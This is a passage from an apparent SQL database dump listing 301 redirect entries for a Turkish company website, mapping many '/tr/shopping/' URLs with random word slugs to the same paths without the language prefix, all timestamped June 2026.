00:00:00',301),(71456,'https://3s-technologies.com.tr/tr/shopping/beastliness/1491652934.html',NULL,'https://3s-technologies.com.tr/shopping/beastliness/1491652934.html','',1,0,'2026-06-11 03:30:45','0000-00-00 00:00:00',301),(71457,'https://3s-technologies.com.tr/tr/shopping/managing/2261845416.html',NULL,'https://3s-technologies.com.tr/shopping/managing/2261845416.html','',1,0,'2026-06-11 03:31:11','0000-00-00 00:00:00',301),(71458,'https://3s-technologies.com.tr/tr/shopping/playground/3737219657.html',NULL,'https://3s-technologies.com.tr/shopping/playground/3737219657.html','',1,0,'2026-06-11 03:31:20','0000-00-00 00:00:00',301),(71459,'https://3s-technologies.com.tr/tr/shopping/goddaughter/2080751047.html',NULL,'https://3s-technologies.com.tr/shopping/goddaughter/2080751047.html','',1,0,'2026-06-11 03:32:01','0000-00-00 00:00:00',301),(71460,'https://3s-technologies.com.tr/tr/shopping/disseize/2292737424.html',NULL,'https://3s-technologies.com.tr/shopping/disseize/2292737424.html','',1,0,'2026-06-11 03:32:38','0000-00-00 00:00:00',301),(71461,'https://3s-technologies.com.tr/tr/shopping/suppurating/2027389465.html',NULL,'https://3s-technologies.com.tr/shopping/suppurating/2027389465.html','',1,0,'2026-06-11 03:32:58','0000-00-00 00:00:00',301),(71462,'https://3s-technologies.com.tr/tr/shopping/duelist/1911919312.html',NULL,'https://3s-technologies.com.tr/shopping/duelist/1911919312.html','',1,0,'2026-06-11 03:33:14','0000-00-00 00:00:00',301),(71463,'https://3s-technologies.com.tr/tr/shopping/nonacceptance/2956565771.html',NULL,'https://3s-technologies.com.tr/shopping/nonacceptance/2956565771.html','',1,0,'2026-06-11 03:33:38','0000-00-00 00:00:00',301),(71464,'https://3s-technologies.com.tr/tr/shopping/distance/2002760104.html',NULL,'https://3s-technologies.com.tr/shopping/distance/2002760104.html','',1,0,'2026-06-11 03:34:18','0000-00-00 00:00:00',301),(71465,'https://3s-technologies.com.tr/tr/shopping/dolmans/785876273.html',NULL,'https://3s-technologies.com.tr/shopping/dolmans/785876273.html','',1,0,'2026-06-11 03:34:25','0000-00-00 00:00:00',301),(71466,'https://3s-technologies.com.tr/tr/shopping/demersion/2851186270.html',NULL,'https://3s-technologies.com.tr/shopping/demersion/2851186270.html','',1,0,'2026-06-11 03:35:00','0000-00-00 00:00:00',301),(71467,'https://3s-technologies.com.tr/tr/shopping/offbase/514440394.html',NULL,'https://3s-technologies.com.tr/shopping/offbase/514440394.html','',1,0,'2026-06-11 03:36:16','0000-00-00 00:00:00',301),(71468,'https://3s-technologies.com.tr/tr/shopping/effectually/1558085537.html',NULL,'https://3s-technologies.com.tr/shopping/effectually/1558085537.html','',1,0,'2026-06-11 03:36:18','0000-00-00 00:00:00',301),(71469,'https://3s-technologies.com.tr/tr/shopping/ebenum/77745772.html',NULL,'https://3s-technologies.com.tr/shopping/ebenum/77745772.html','',1,0,'2026-06-11 03:36:22','0000-00-00 00:00:00',301),(71470,'https://3s-technologies.com.tr/tr/shopping/leadmen/3909184792.html',NULL,'https://3s-technologies.com.tr/shopping/leadmen/3909184792.html','',1,0,'2026-06-11 03:36:25','0000-00-00 00:00:00',301),(71471,'https://3s-technologies.com.tr/tr/shopping/makebelieve/1663153764.html',NULL,'https://3s-technologies.com.tr/shopping/makebelieve/1663153764.html','',1,0,'2026-06-11 03:36:28','0000-00-00 00:00:00',301),(71472,'https://3s-technologies.com.tr/tr/shopping/chartometer/2119836994.html',NULL,'https://3s-technologies.com.tr/shopping/chartometer/2119836994.html','',1,0,'2026-06-11 03:36:30','0000-00-00 00:00:00',301),(71473,'https://3s-technologies.com.tr/tr/shopping/shepherdly/3937093044.html',NULL,'https://3s-technologies.com.tr/shopping/shepherdly/3937093044.html','',1,0,'2026-06-11 03:36:42','0000-00-00 00:00:00',301),(71474,'https://3s-technologies.com.tr/tr/shopping/intercluded/241643393.html',NULL,'https://3s-technologies.com.tr/shopping/intercluded/241643393.html','',1,0,'2026-06-11 03:36:45','0000-00-00 00:00:00',301),(71475,'https://3s-technologies.com.tr/tr/shopping/argulus/4242856891.html',NULL,'https://3s-technologies.com.tr/shopping/argulus/4242856891.html','',1,0,'2026-06-11 03:36:48','0000-00-00 00:00:00',301),(71476,'https://3s-technologies.com.tr/tr/shopping/ficus/1156947633.html',NULL,'https://3s-technologies.com.tr/shopping/ficus/1156947633.html','',1,0,'2026-06-11 03:36:51','0000-00-00 00:00:00',301),(71477,'https://3s-technologies.com.tr/tr/shopping/installing/1025069607.html',NULL,'https://3s-technologies.com.tr/shopping/installing/1025069607.html','',1,0,'2026-06-11 03:36:54','0000-00-00 00:00:00',301),(71478,'https://3s-technologies.com.tr/tr/shopping/effectuate/4200548978.html',NULL,'https://3s-technologies.com.tr/shopping/effectuate/4200548978.html','',1,0,'2026-06-11 03:37:05','0000-00-00 00:00:00',301),(71479,'https://3s-technologies.com.tr/tr/shopping/inking/989535854.html',NULL,'https://3s-technologies.com.tr/shopping/inking/989535854.html','',1,0,'2026-06-11 03:37:07','0000-00-00 00:00:00',301),(71480,'https://3s-technologies.com.tr/tr/shopping/tarso/3753564355.html',NULL,'https://3s-technologies.com.tr/shopping/tarso/3753564355.html','',1,0,'2026-06-11 03:37:11','0000-00-00 00:00:00',301),(71481,'https://3s-technologies.com.tr/tr/shopping/inutterable/4260085314.html',NULL,'https://3s-technologies.com.tr/shopping/inutterable/4260085314.html','',1,0,'2026-06-11 03:37:13','0000-00-00 00:00:00',301),(71482,'https://3s-technologies.com.tr/tr/shopping/intercessorial/3045366041.html',NULL,'https://3s-technologies.com.tr/shopping/intercessorial/3045366041.html','',1,0,'2026-06-11 03:37:16','0000-00-00 00:00:00',301),(71483,'https://3s-technologies.com.tr/tr/shopping/angling/2589342104.html',NULL,'https://3s-technologies.com.tr/shopping/angling/2589342104.html','',1,0,'2026-06-11 03:37:19','0000-00-00 00:00:00',301),(71484,'https://3s-technologies.com.tr/tr/shopping/grounded/1753851480.html',NULL,'https://3s-technologies.com.tr/shopping/grounded/1753851480.html','',1,0,'2026-06-11 03:37:22','0000-00-00 00:00:00',301),(71485,'https://3s-technologies.com.tr/tr/shopping/misgiven/4113706270.html',NULL,'https://3s-technologies.com.tr/shopping/misgiven/4113706270.html','',1,0,'2026-06-11 03:37:25','0000-00-00 00:00:00',301),(71486,'https://3s-technologies.com.tr/tr/shopping/prolog/466370672.html',NULL,'https://3s-technologies.com.tr/shopping/prolog/466370672.html','',1,0,'2026-06-11 03:37:28','0000-00-00 00:00:00',301),(71487,'https://3s-technologies.com.tr/tr/shopping/polytechnic/1968022507.html',NULL,'https://3s-technologies.com.tr/shopping/polytechnic/1968022507.html','',1,0,'2026-06-11 03:37:31','0000-00-00 00:00:00',301),(71488,'https://3s-technologies.com.tr/tr/shopping/practicality/3899449889.html',NULL,'https://3s-technologies.com.tr/shopping/practicality/3899449889.html','',1,0,'2026-06-11 03:37:34','0000-00-00 00:00:00',301),(71489,'https://3s-technologies.com.tr/tr/shopping/pectinal/4291842212.html',NULL,'https://3s-technologies.com.tr/shopping/pectinal/4291842212.html','',1,0,'2026-06-11 03:37:37','0000-00-00 00:00:00',301),(71490,'https://3s-technologies.com.tr/tr/shopping/affectedly/3383461216.html',NULL,'https://3s-technologies.com.tr/shopping/affectedly/3383461216.html','',1,0,'2026-06-11 03:37:40','0000-00-00 00:00:00',301),(71491,'https://3s-technologies.com.tr/tr/shopping/lockup/4235371932.html',NULL,'https://3s-technologies.com.tr/shopping/lockup/4235371932.html','',1,0,'2026-06-11 03:37:43','0000-00-00 00:00:00',301),(71492,'https://3s-technologies.com.tr/tr/shopping/commanded/431315206.html',NULL,'https://3s-technologies.com.tr/shopping/commanded/431315206.html','',1,0,'2026-06-11 03:37:58','0000-00-00 00:00:00',301),(71493,'https://3s-technologies.com.tr/tr/shopping/spinneys/2853948622.html',NULL,'https://3s-technologies.com.tr/shopping/spinneys/2853948622.html','',1,0,'2026-06-11 03:38:03','0000-00-00 00:00:00',301),(71494,'https://3s-technologies.com.tr/tr/shopping/echinococcus/1923713511.html',NULL,'https://3s-technologies.com.tr/shopping/echinococcus/1923713511.html','',1,0,'2026-06-11 03:38:06','0000-00-00 00:00:00',301),(71495,'https://3s-technologies.com.tr/tr/shopping/squish/484282182.html',NULL,'https://3s-technologies.com.tr/shopping/squish/484282182.html','',1,0,'2026-06-11 03:38:09','0000-00-00 00:00:00',301),(71496,'https://3s-technologies.com.tr/tr/shopping/manille/2769106965.html',NULL,'https://3s-technologies.com.tr/shopping/manille/2769106965.html','',1,0,'2026-06-11 03:38:12','0000-00-00 00:00:00',301),(71497,'https://3s-technologies.com.tr/tr/shopping/squaring/2101375313.html',NULL,'https://3s-technologies.com.tr/shopping/squaring/2101375313.html','',1,0,'2026-06-11 03:38:15','0000-00-00 00:00:00',301),(71498,'https://3s-technologies.com.tr/tr/shopping/classics/800547112.html',NULL,'https://3s-technologies.com.tr/shopping/classics/800547112.html','',1,0,'2026-06-11 03:38:18','0000-00-00 00:00:00',301),(71499,'https://3s-technologies.com.tr/tr/shopping/accelerometer/2982972596.html',NULL,'https://3s-technologies.com.tr/shopping/accelerometer/2982972596.html','',1,0,'2026-06-11 03:38:21','0000-00-00 00:00:00',301),(71500,'https://3s-technologies.com.tr/tr/shopping/conceding/1812302364.html',NULL,'https://3s-technologies.com.tr/shopping/conceding/1812302364.html','',1,0,'2026-06-11 03:38:24','0000-00-00 00:00:00',301),(71501,'https://3s-technologies.com.tr/tr/shopping/phlogisticating/3273349705.html',NULL,'https://3s-technologies.com.tr/shopping/phlogisticating/3273349705.html','',1,0,'2026-06-11 03:38:27','0000-00-00 00:00:00',301),(71502,'https://3s-technologies.com.tr/tr/shopping/plicate/2573035626.html',NULL,'https://3s-technologies.com.tr/shopping/plicate/2573035626.html','',1,0,'2026-06-11 03:38:30','0000-00-00 00:00:00',301),(71503,'https://3s-technologies.com.tr/tr/shopping/pluralizing/1662990257.html',NULL,'https://3s-technologies.com.tr/shopping/pluralizing/1662990257.html','',1,0,'2026-06-11 03:38:33','0000-00-00 00:00:00',301),(71504,'https://3s-technologies.com.tr/tr/shopping/ternately/3684560305.html',NULL,'https://3s-technologies.com.tr/shopping/ternately/3684560305.html','',1,0,'2026-06-11 03:38:36','0000-00-00 00:00:00',301),(71505,'https://3s-technologies.com.tr/tr/shopping/pendulum/3079469000.html',NULL,'https://3s-technologies.com.tr/shopping/pendulum/3079469000.html','',1,0,'2026-06-11 03:38:39','0000-00-00 00:00:00',301),(71506,'https://3s-technologies.com.tr/tr/shopping/pathogenic/2354581207.html',NULL,'https://3s-technologies.com.tr/shopping/pathogenic/2354581207.html','',1,0,'2026-06-11 03:38:45','0000-00-00 00:00:00',301),(71507,'https://3s-technologies.com.tr/tr/shopping/centralize/4197250426.html',NULL,'https://3s-technologies.com.tr/shopping/centralize/4197250426.html','',1,0,'2026-06-11 03:38:48','0000-00-00 00:00:00',301),(71508,'https://3s-technologies.com.tr/tr/shopping/dance/974874386.html',NULL,'https://3s-technologies.com.tr/shopping/dance/974874386.html','',1,0,'2026-06-11 03:38:51','0000-00-00 00:00:00',301),(71509,'https://3s-technologies.com.tr/tr/shopping/plesance/861328337.html',NULL,'https://3s-technologies.com.tr/shopping/plesance/861328337.html','',1,0,'2026-06-11 03:38:54','0000-00-00 00:00:00',301),(71510,'https://3s-technologies.com.tr/tr/shopping/emulated/3264086759.html',NULL,'https://3s-technologies.com.tr/shopping/emulated/3264086759.html','',1,0,'2026-06-11 03:38:57','0000-00-00 00:00:00',301),(71511,'https://3s-technologies.com.tr/tr/shopping/profound/83546643.html',NULL,'https://3s-technologies.com.tr/shopping/profound/83546643.html','',1,0,'2026-06-11 03:39:00','0000-00-00 00:00:00',301),(71512,'https://3s-technologies.com.tr/tr/shopping/vanner/4158102803.html',NULL,'https://3s-technologies.com.tr/shopping/vanner/4158102803.html','',1,0,'2026-06-11 03:39:03','0000-00-00 00:00:00',301),(71513,'https://3s-technologies.com.tr/tr/shopping/comities/2908732631.html',NULL,'https://3s-technologies.com.tr/shopping/comities/2908732631.html','',1,0,'2026-06-11 03:39:06','0000-00-00 00:00:00',301),(71514,'https://3s-technologies.com.tr/tr/shopping/authenticate/2565148318.html',NULL,'https://3s-technologies.com.tr/shopping/authenticate/2565148318.html','',1,0,'2026-06-11 03:39:09','0000-00-00 00:00:00',301),(71515,'https://3s-technologies.com.tr/tr/shopping/setwal/3726263252.html',NULL,'https://3s-technologies.com.tr/shopping/setwal/3726263252.html','',1,0,'2026-06-11 03:39:12','0000-00-00 00:00:00',301),(71516,'https://3s-technologies.com.tr/tr/shopping/formularization/4113542747.html',NULL,'https://3s-technologies.com.tr/shopping/formularization/4113542747.html','',1,0,'2026-06-11 03:39:15','0000-00-00 00:00:00',301),(71517,'https://3s-technologies.com.tr/tr/shopping/nardus/917460479.html',NULL,'https://3s-technologies.com.tr/shopping/nardus/917460479.html','',1,0,'2026-06-11 03:39:18','0000-00-00 00:00:00',301),(71518,'https://3s-technologies.com.tr/tr/shopping/whensoever/2797100603.html',NULL,'https://3s-technologies.com.tr/shopping/whensoever/2797100603.html','',1,0,'2026-06-11 03:39:21','0000-00-00 00:00:00',301),(71519,'https://3s-technologies.com.tr/tr/shopping/sizing/1098496765.html',NULL,'https://3s-technologies.com.tr/shopping/sizing/1098496765.html','',1,0,'2026-06-11 03:39:24','0000-00-00 00:00:00',301),(71520,'https://3s-technologies.com.tr/tr/shopping/mistrust/1384060048.html',NULL,'https://3s-technologies.com.tr/shopping/mistrust/1384060048.html','',1,0,'2026-06-11 03:39:31','0000-00-00 00:00:00',301),(71521,'https://3s-technologies.com.tr/tr/shopping/outpeer/3469482575.html',NULL,'https://3s-technologies.com.tr/shopping/outpeer/3469482575.html','',1,0,'2026-06-11 03:39:33','0000-00-00 00:00:00',301),(71522,'https://3s-technologies.com.tr/tr/shopping/stroboscope/303243723.html',NULL,'https://3s-technologies.com.tr/shopping/stroboscope/303243723.html','',1,0,'2026-06-11 03:39:36','0000-00-00 00:00:00',301),(71523,'https://3s-technologies.com.tr/tr/shopping/heptagonal/2431245370.html',NULL,'https://3s-technologies.com.tr/shopping/heptagonal/2431245370.html','',1,0,'2026-06-11 03:39:39','0000-00-00 00:00:00',301),(71524,'https://3s-technologies.com.tr/tr/shopping/cavil/2139018468.html',NULL,'https://3s-technologies.com.tr/shopping/cavil/2139018468.html','',1,0,'2026-06-11 03:39:42','0000-00-00 00:00:00',301),(71525,'https://3s-technologies.com.tr/tr/shopping/selftorture/4288465523.html',NULL,'https://3s-technologies.com.tr/shopping/selftorture/4288465523.html','',1,0,'2026-06-11 03:39:45','0000-00-00 00:00:00',301),(71526,'https://3s-technologies.com.tr/tr/shopping/dinnerly/3455763802.html',NULL,'https://3s-technologies.com.tr/shopping/dinnerly/3455763802.html','',1,0,'2026-06-11 03:39:49','0000-00-00 00:00:00',301),(71527,'https://3s-technologies.com.tr/tr/shopping/cleared/2019973272.html',NULL,'https://3s-technologies.com.tr/shopping/cleared/2019973272.html','',1,0,'2026-06-11 03:39:52','0000-00-00 00:00:00',301),(71528,'https://3s-technologies.com.tr/tr/shopping/convincing/2598683203.html',NULL,'https://3s-technologies.com.tr/shopping/convincing/2598683203.html','',1,0,'2026-06-11 03:39:54','0000-00-00 00:00:00',301),(71529,'https://3s-technologies.com.tr/tr/shopping/humaneness/2395601083.html',NULL,'https://3s-technologies.com.tr/shopping/humaneness/2395601083.html','',1,0,'2026-06-11 03:40:02','0000-00-00 00:00:00',301),(71530,'https://3s-technologies.com.tr/tr/shopping/invict/656831966.html',NULL,'https://3s-technologies.com.tr/shopping/invict/656831966.html','',1,0,'2026-06-11 03:40:02','0000-00-00 00:00:00',301),(71531,'https://3s-technologies.com.tr/tr/shopping/intercalate/3115113303.html',NULL,'https://3s-technologies.com.tr/shopping/intercalate/3115113303.html','',1,0,'2026-06-11 03:40:04','0000-00-00 00:00:00',301),(71532,'https://3s-technologies.com.tr/tr/shopping/triplication/1364280796.html',NULL,'https://3s-technologies.com.tr/shopping/triplication/1364280796.html','',1,0,'2026-06-11 03:40:08','0000-00-00 00:00:00',301),(71533,'https://3s-technologies.com.tr/tr/shopping/pestis/3607021804.html',NULL,'https://3s-technologies.com.tr/shopping/pestis/3607021804.html','',1,0,'2026-06-11 03:40:10','0000-00-00 00:00:00',301),(71534,'https://3s-technologies.com.tr/tr/shopping/switchboard/2413639224.html',NULL,'https://3s-technologies.com.tr/shopping/switchboard/2413639224.html','',1,0,'2026-06-11 03:40:13','0000-00-00 00:00:00',301),(71535,'https://3s-technologies.com.tr/tr/shopping/pouring/1885975945.html',NULL,'https://3s-technologies.com.tr/shopping/pouring/1885975945.html','',1,0,'2026-06-11 03:40:18','0000-00-00 00:00:00',301),(71536,'https://3s-technologies.com.tr/tr/shopping/pance/3354358768.html',NULL,'https://3s-technologies.com.tr/shopping/pance/3354358768.html','',1,0,'2026-06-11 03:40:20','0000-00-00 00:00:00',301),(71537,'https://3s-technologies.com.tr/tr/shopping/delire/511641166.html',NULL,'https://3s-technologies.com.tr/shopping/delire/511641166.html','',1,0,'2026-06-11 03:40:23','0000-00-00 00:00:00',301),(71538,'https://3s-technologies.com.tr/tr/shopping/anemometric/3456180471.html',NULL,'https://3s-technologies.com.tr/shopping/anemometric/3456180471.html','',1,0,'2026-06-11 03:40:26','0000-00-00 00:00:00',301),(71539,'https://3s-technologies.com.tr/tr/shopping/genitocrural/2538132291.html',NULL,'https://3s-technologies.com.tr/shopping/genitocrural/2538132291.html','',1,0,'2026-06-11 03:40:29','0000-00-00 00:00:00',301),(71540,'https://3s-technologies.com.tr/tr/shopping/tidemark/399433715.html',NULL,'https://3s-technologies.com.tr/shopping/tidemark/399433715.html','',1,0,'2026-06-11 03:40:32','0000-00-00 00:00:00',301),(71541,'https://3s-technologies.com.tr/tr/shopping/invalide/616764581.html',NULL,'https://3s-technologies.com.tr/shopping/invalide/616764581.html','',1,0,'2026-06-11 03:40:35','0000-00-00 00:00:00',301),(71542,'https://3s-technologies.com.tr/tr/shopping/dialis/1322183868.html',NULL,'https://3s-technologies.com.tr/shopping/dialis/1322183868.html','',1,0,'2026-06-11 03:40:38','0000-00-00 00:00:00',301),(71543,'https://3s-technologies.com.tr/tr/shopping/pella/355037182.html',NULL,'https://3s-technologies.com.tr/shopping/pella/355037182.html','',1,0,'2026-06-11 03:40:41','0000-00-00 00:00:00',301),(71544,'https://3s-technologies.com.tr/tr/shopping/republicanized/2157813699.html',NULL,'https://3s-technologies.com.tr/shopping/republicanized/2157813699.html','',1,0,'2026-06-11 03:40:44','0000-00-00 00:00:00',301),(71545,'https://3s-technologies.com.tr/tr/shopping/inhospitably/1057376167.html',NULL,'https://3s-technologies.com.tr/shopping/inhospitably/1057376167.html','',1,0,'2026-06-11 03:40:47','0000-00-00 00:00:00',301),(71546,'https://3s-technologies.com.tr/tr/shopping/tempers/4262926165.html',NULL,'https://3s-technologies.com.tr/shopping/tempers/4262926165.html','',1,0,'2026-06-11 03:40:50','0000-00-00 00:00:00',301),(71547,'https://3s-technologies.com.tr/tr/shopping/epeira/314296197.html',NULL,'https://3s-technologies.com.tr/shopping/epeira/314296197.html','',1,0,'2026-06-11 03:40:53','0000-00-00 00:00:00',301),(71548,'https://3s-technologies.com.tr/tr/shopping/usher/1108204163.html',NULL,'https://3s-technologies.com.tr/shopping/usher/1108204163.html','',1,0,'2026-06-11 03:40:56','0000-00-00 00:00:00',301),(71549,'https://3s-technologies.com.tr/tr/shopping/tumbledown/1127511644.html',NULL,'https://3s-technologies.com.tr/shopping/tumbledown/1127511644.html','',1,0,'2026-06-11 03:41:00','0000-00-00 00:00:00',301),(71550,'https://3s-technologies.com.tr/tr/shopping/timeful/2509079864.html',NULL,'https://3s-technologies.com.tr/shopping/timeful/2509079864.html','',1,0,'2026-06-11 03:41:05','0000-00-00 00:00:00',301),(71551,'https://3s-technologies.com.tr/tr/shopping/cyanophyll/2196804347.html',NULL,'https://3s-technologies.com.tr/shopping/cyanophyll/2196804347.html','',1,0,'2026-06-11 03:41:08','0000-00-00 00:00:00',301),(71552,'https://3s-technologies.com.tr/tr/shopping/saccharimeter/856576010.html',NULL,'https://3s-technologies.com.tr/shopping/saccharimeter/856576010.html','',1,0,'2026-06-11 03:41:11','0000-00-00 00:00:00',301),(71553,'https://3s-technologies.com.tr/tr/shopping/succade/1033189220.html',NULL,'https://3s-technologies.com.tr/shopping/succade/1033189220.html','',1,0,'2026-06-11 03:41:14','0000-00-00 00:00:00',301),(71554,'https://3s-technologies.com.tr/tr/shopping/hypozoic/4207371484.html',NULL,'https://3s-technologies.com.tr/shopping/hypozoic/4207371484.html','',1,0,'2026-06-11 03:41:17','0000-00-00 00:00:00',301),(71555,'https://3s-technologies.com.tr/tr/shopping/oeildeperdrix/3037978009.html',NULL,'https://3s-technologies.com.tr/shopping/oeildeperdrix/3037978009.html','',1,0,'2026-06-11 03:41:20','0000-00-00 00:00:00',301),(71556,'https://3s-technologies.com.tr/tr/shopping/gobstick/139732225.html',NULL,'https://3s-technologies.com.tr/shopping/gobstick/139732225.html','',1,0,'2026-06-11 03:41:23','0000-00-00 00:00:00',301),(71557,'https://3s-technologies.com.tr/tr/shopping/brittleness/1445225152.html',NULL,'https://3s-technologies.com.tr/shopping/brittleness/1445225152.html','',1,0,'2026-06-11 03:41:26','0000-00-00 00:00:00',301),(71558,'https://3s-technologies.com.tr/tr/shopping/hounding/3625486046.html',NULL,'https://3s-technologies.com.tr/shopping/hounding/3625486046.html','',1,0,'2026-06-11 03:41:29','0000-00-00 00:00:00',301),(71559,'https://3s-technologies.com.tr/tr/shopping/blacktie/1646791998.html',NULL,'https://3s-technologies.com.tr/shopping/blacktie/1646791998.html','',1,0,'2026-06-11 03:41:32','0000-00-00 00:00:00',301),(71560,'https://3s-technologies.com.tr/tr/shopping/anelectric/1669340774.html',NULL,'https://3s-technologies.com.tr/shopping/anelectric/1669340774.html','',1,0,'2026-06-11 03:41:35','0000-00-00 00:00:00',301),(71561,'https://3s-technologies.com.tr/tr/shopping/macrorhamphus/2068409341.html',NULL,'https://3s-technologies.com.tr/shopping/macrorhamphus/2068409341.html','',1,0,'2026-06-11 03:41:38','0000-00-00 00:00:00',301),(71562,'https://3s-technologies.com.tr/tr/shopping/adventitial/2520431895.html',NULL,'https://3s-technologies.com.tr/shopping/adventitial/2520431895.html','',1,0,'2026-06-11 03:41:44','0000-00-00 00:00:00',301),(71563,'https://3s-technologies.com.tr/tr/shopping/syllabify/216623615.html',NULL,'https://3s-technologies.com.tr/shopping/syllabify/216623615.html','',1,0,'2026-06-11 03:41:47','0000-00-00 00:00:00',301),(71564,'https://3s-technologies.com.tr/tr/shopping/absurdities/4221414540.html',NULL,'https://3s-technologies.com.tr/shopping/absurdities/4221414540.html','',1,0,'2026-06-11 03:41:50','0000-00-00 00:00:00',301),(71565,'https://3s-technologies.com.tr/tr/shopping/trimorphic/3360654490.html',NULL,'https://3s-technologies.com.tr/shopping/trimorphic/3360654490.html','',1,0,'2026-06-11 03:41:53','0000-00-00 00:00:00',301),(71566,'https://3s-technologies.com.tr/tr/shopping/piperaceae/601164084.html',NULL,'https://3s-technologies.com.tr/shopping/piperaceae/601164084.html','',1,0,'2026-06-11 03:41:56','0000-00-00 00:00:00',301),(71567,'https://3s-technologies.com.tr/tr/shopping/decrescendo/2215532986.html',NULL,'https://3s-technologies.com.tr/shopping/decrescendo/2215532986.html','',1,0,'2026-06-11 03:41:59','0000-00-00 00:00:00',301),(71568,'https://3s-technologies.com.tr/tr/shopping/froggy/2487658163.html',NULL,'https://3s-technologies.com.tr/shopping/froggy/2487658163.html','',1,0,'2026-06-11 03:42:02','0000-00-00 00:00:00',301),(71569,'https://3s-technologies.com.tr/tr/shopping/exilition/851525478.html',NULL,'https://3s-technologies.com.tr/shopping/exilition/851525478.html','',1,0,'2026-06-11 03:42:05','0000-00-00 00:00:00',301),(71570,'https://3s-technologies.com.tr/tr/shopping/narcotine/4092882331.html',NULL,'https://3s-technologies.com.tr/shopping/narcotine/4092882331.html','',1,0,'2026-06-11 03:42:08','0000-00-00 00:00:00',301),(71571,'https://3s-technologies.com.tr/tr/shopping/hypnogenic/1012979634.html',NULL,'https://3s-technologies.com.tr/shopping/hypnogenic/1012979634.html','',1,0,'2026-06-11 03:42:11','0000-00-00 00:00:00',301),(71572,'https://3s-technologies.com.tr/tr/shopping/theory/4099028560.html',NULL,'https://3s-technologies.com.tr/shopping/theory/4099028560.html','',1,0,'2026-06-11 03:42:14','0000-00-00 00:00:00',301),(71573,'https://3s-technologies.com.tr/tr/shopping/antaean/3788096591.html',NULL,'https://3s-technologies.com.tr/shopping/antaean/3788096591.html','',1,0,'2026-06-11 03:42:17','0000-00-00 00:00:00',301),(71574,'https://3s-technologies.com.tr/tr/shopping/quietest/3909762253.html',NULL,'https://3s-technologies.com.tr/shopping/quietest/3909762253.html','',1,0,'2026-06-11 03:42:20','0000-00-00 00:00:00',301),(71575,'https://3s-technologies.com.tr/tr/shopping/troad/1879703143.html',NULL,'https://3s-technologies.com.tr/shopping/troad/1879703143.html','',1,0,'2026-06-11 03:42:25','0000-00-00 00:00:00',301),(71576,'https://3s-technologies.com.tr/tr/shopping/satiate/3851029933.html',NULL,'https://3s-technologies.com.tr/shopping/satiate/3851029933.html','',1,0,'2026-06-11 03:42:27','0000-00-00 00:00:00',301),(71577,'https://3s-technologies.com.tr/tr/shopping/chalybeate/1928456435.html',NULL,'https://3s-technologies.com.tr/shopping/chalybeate/1928456435.html','',1,0,'2026-06-11 03:42:30','0000-00-00 00:00:00',301),(71578,'https://3s-technologies.com.tr/tr/shopping/endogenetic/1712003099.html',NULL,'https://3s-technologies.com.tr/shopping/endogenetic/1712003099.html','',1,0,'2026-06-11 03:42:33','0000-00-00 00:00:00',301),(71579,'https://3s-technologies.com.tr/tr/shopping/acoustic/277018701.html',NULL,'https://3s-technologies.com.tr/shopping/acoustic/277018701.html','',1,0,'2026-06-11 03:42:36','0000-00-00 00:00:00',301),(71580,'https://3s-technologies.com.tr/tr/shopping/agalaxy/3505117475.html',NULL,'https://3s-technologies.com.tr/shopping/agalaxy/3505117475.html','',1,0,'2026-06-11 03:42:39','0000-00-00 00:00:00',301),(71581,'https://3s-technologies.com.tr/tr/shopping/gainlessness/3646907731.html',NULL,'https://3s-technologies.com.tr/shopping/gainlessness/3646907731.html','',1,0,'2026-06-11 03:42:42','0000-00-00 00:00:00',301),(71582,'https://3s-technologies.com.tr/tr/shopping/molar/3194930568.html',NULL,'https://3s-technologies.com.tr/shopping/molar/3194930568.html','',1,0,'2026-06-11 03:42:46','0000-00-00 00:00:00',301),(71583,'https://3s-technologies.com.tr/tr/shopping/manofwar/1460682443.html',NULL,'https://3s-technologies.com.tr/shopping/manofwar/1460682443.html','',1,0,'2026-06-11 03:42:48','0000-00-00 00:00:00',301),(71584,'https://3s-technologies.com.tr/tr/shopping/bipinnate/4043558855.html',NULL,'https://3s-technologies.com.tr/shopping/bipinnate/4043558855.html','',1,0,'2026-06-11 03:42:52','0000-00-00 00:00:00',301),(71585,'https://3s-technologies.com.tr/tr/shopping/blanchimeter/405860856.html',NULL,'https://3s-technologies.com.tr/shopping/blanchimeter/405860856.html','',1,0,'2026-06-11 03:42:54','0000-00-00 00:00:00',301),(71586,'https://3s-technologies.com.tr/tr/shopping/antitussive/1992370445.html',NULL,'https://3s-technologies.com.tr/shopping/antitussive/1992370445.html','',1,0,'2026-06-11 03:42:57','0000-00-00 00:00:00',301),(71587,'https://3s-technologies.com.tr/tr/shopping/assure/195420392.html',NULL,'https://3s-technologies.com.tr/shopping/assure/195420392.html','',1,0,'2026-06-11 03:43:01','0000-00-00 00:00:00',301),(71588,'https://3s-technologies.com.tr/tr/shopping/zenithal/1818737905.html',NULL,'https://3s-technologies.com.tr/shopping/zenithal/1818737905.html','',1,0,'2026-06-11 03:43:07','0000-00-00 00:00:00',301),(71589,'https://3s-technologies.com.tr/tr/shopping/treckschuyt/1334427977.html',NULL,'https://3s-technologies.com.tr/shopping/treckschuyt/1334427977.html','',1,0,'2026-06-11 03:43:11','0000-00-00 00:00:00',301),(71590,'https://3s-technologies.com.tr/tr/shopping/ferricyanate/790465045.html',NULL,'https://3s-technologies.com.tr/shopping/ferricyanate/790465045.html','',1,0,'2026-06-11 03:43:14','0000-00-00 00:00:00',301),(71591,'https://3s-technologies.com.tr/tr/shopping/chattelism/276066210.html',NULL,'https://3s-technologies.com.tr/shopping/chattelism/276066210.html','',1,0,'2026-06-11 03:43:17','0000-00-00 00:00:00',301),(71592,'https://3s-technologies.com.tr/tr/shopping/strontianite/3921893193.html',NULL,'https://3s-technologies.com.tr/shopping/strontianite/3921893193.html','',1,0,'2026-06-11 03:43:20','0000-00-00 00:00:00',301),(71593,'https://3s-technologies.com.tr/tr/shopping/libratory/1766559881.html',NULL,'https://3s-technologies.com.tr/shopping/libratory/1766559881.html','',1,0,'2026-06-11 03:43:23','0000-00-00 00:00:00',301),(71594,'https://3s-technologies.com.tr/tr/shopping/livingly/3873137298.html',NULL,'https://3s-technologies.com.tr/shopping/livingly/3873137298.html','',1,0,'2026-06-11 03:43:26','0000-00-00 00:00:00',301),(71595,'https://3s-technologies.com.tr/tr/shopping/nigeot/3782527151.html',NULL,'https://3s-technologies.com.tr/shopping/nigeot/3782527151.html','',1,0,'2026-06-11 03:43:29','0000-00-00 00:00:00',301),(71596,'https://3s-technologies.com.tr/tr/shopping/laverania/3979872088.html',NULL,'https://3s-technologies.com.tr/shopping/laverania/3979872088.html','',1,0,'2026-06-11 03:43:32','0000-00-00 